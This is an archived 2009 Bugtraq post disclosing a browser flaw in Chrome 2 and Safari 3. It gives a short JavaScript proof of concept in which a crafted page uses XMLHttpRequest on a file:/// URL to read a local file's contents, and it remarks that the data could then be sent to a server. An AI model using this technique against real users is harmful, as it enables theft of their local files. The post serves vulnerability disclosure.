[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
From: pantera_bleed@xxxxxxxxxxx
Date: Tue, 9 Jun 2009 10:33:09 -0600

.html can be crafted to force a unaware user to read file from local, and then 
possibly send it to a server.

var method = "GET"
var URL = "file:///C:/argentina/bsas_junin.txt"
xmlhttp.open( method, URL, true)

This type of request is possible if file is on user local  in the user hard 
disk (CHROME2), in other browser I was able to do the same but with a LAN 
access to file, no need to write in local hard disk (SAFARI3)


if (xmlhttp != null) {
        xmlhttp.open( method, URL, true)
        xmlhttp.onreadystatechange=function(){
        if (xmlhttp.readyState==4) {
           alert(URL + "\n\n" + xmlhttp.responseText)
                }
                }        
        }

this is a valid operation javascript can read then xmlhttp.responseText, yes 
the file content.

After this you can do whatever you want whit the file.

note that you MUST know the file path!!

crafted by: federico.lanusse
pantera_bleed@xxxxxxxxxxx
federico.lanusse@xxxxxxxxxxxx

company: clarolab QA team
yeah! lets rock Ateam!!

Chrome ISSUE, with attached POC.
http://code.google.com/p/chromium/issues/detail?id=13671

Follow-Ups:
- Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
  - From: Adrian P.
- Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
  - From: Michal Zalewski

Prev by Date: Apple Safari local file theft vulnerability
Next by Date: TELUS Security Labs VR - Microsoft Office Excel Malformed Records Stack Buffer Overflow
Previous by thread: Apple Safari local file theft vulnerability
Next by thread: Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
Index(es):
- Date
- Thread